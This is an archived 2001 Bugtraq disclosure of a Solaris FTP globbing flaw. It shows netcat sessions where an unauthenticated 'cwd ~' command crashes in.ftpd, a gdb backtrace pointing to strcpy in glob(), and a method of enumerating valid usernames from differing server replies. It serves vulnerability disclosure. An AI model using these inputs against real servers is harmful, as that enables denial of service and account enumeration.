 | ||||||
| << Previous | INDEX | Search | src | Set bookmark | Go to bookmark | Next >> |
| ||||||
| |||||||||||||||||||||
Date: Wed, 11 Apr 2001 17:50:39 +0200 From: Johnny Cyberpunk <johncybpk@GMX.NET> To: BUGTRAQ@SECURITYFOCUS.COM Subject: SUN SOLARIS 5.6/5.7 FTP Globbing Exploit ! Hi, i've tested these globbing vulnerability on two different SPARC Solaris Machines. One with 5.6 and one with 5.7 i've started Netcat from a Win2K box to Port 21. C:\>nc 10.64.224.3 21 220 gsmms0 FTP server (SunOS 5.6) ready. cwd ~ 530 Please login with USER and PASS. C:\> As you can see. Without being logged on, i'm landing on the prompt again after putting out the cwd ~ command. Then i've connected via SSH to my Solaris box and saw a fresh CORE File created in / . Then i've started : gdb /usr/sbin/in.ftpd /core which gives me the following information : Copyright 1998 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "sparc-sun-solaris2.7"... (no debugging symbols found)... Core was generated by `in.ftpd'. Program terminated with signal 11, Segmentation Fault. Reading symbols from /usr/lib/libcmd.so.1...(no debugging symbols found)... done. Reading symbols from /usr/lib/libsocket.so.1...(no debugging symbols found)... done. Reading symbols from /usr/lib/libnsl.so.1...(no debugging symbols found)... done. Reading symbols from /usr/lib/libbsm.so.1...(no debugging symbols found)... done. Reading symbols from /usr/lib/libpam.so.1...(no debugging symbols found)... done. Reading symbols from /usr/lib/libdl.so.1...(no debugging symbols found)...done. Reading symbols from /usr/lib/libc.so.1...(no debugging symbols found)...done. Reading symbols from /usr/lib/libmp.so.2...(no debugging symbols found)...done. Reading symbols from /usr/platform/SUNW,Ultra-250/lib/libc_psr.so.1... (no debugging symbols found)...done. #0 0xff1b6dd0 in strcpy () from /usr/lib/libc.so.1 (gdb) bt #0 0xff1b6dd0 in strcpy () from /usr/lib/libc.so.1 #1 0x1648c in glob () #2 0x162e8 in glob () #3 0x161d4 in glob () #4 0x19884 in yyparse () #5 0x13a90 in main () (gdb) As you see a segment fault has happened. After that i've typed in the bt command to get more info about the segment fault. in offset 0xff1b6dd0 the strcpy() command failed and produced the segment fault. This Problem could allow an attacker to execute code on the stack and gain access to the system. Another nice effect is the following : C:\>nc 10.64.224.3 21 220 gsmms0 FTP server (SunOS 5.6) ready. cwd ~netadm 530 Please login with USER and PASS. cwd ~xyz 530 Please login with USER and PASS. 550 Unknown user name after ~ As you see cwd ~netadm just produces a normal 530 message, coz this user exists on the system. the user xyz user doesn't exist and prints out a 550 Unknown user name after ~ This could being used to brute force existing users on the remote system. I saw the same effects on a SPARC Solaris 5.7 box. When i have some more time available i'll write a proof of concept code to exploit this vulnerability, that executes a /bin/sh on the stack. cheers Johnny Cyberpunk ( Johnny.Cyberpunk@illegalaccess.org )
| |||||||||||||||||||||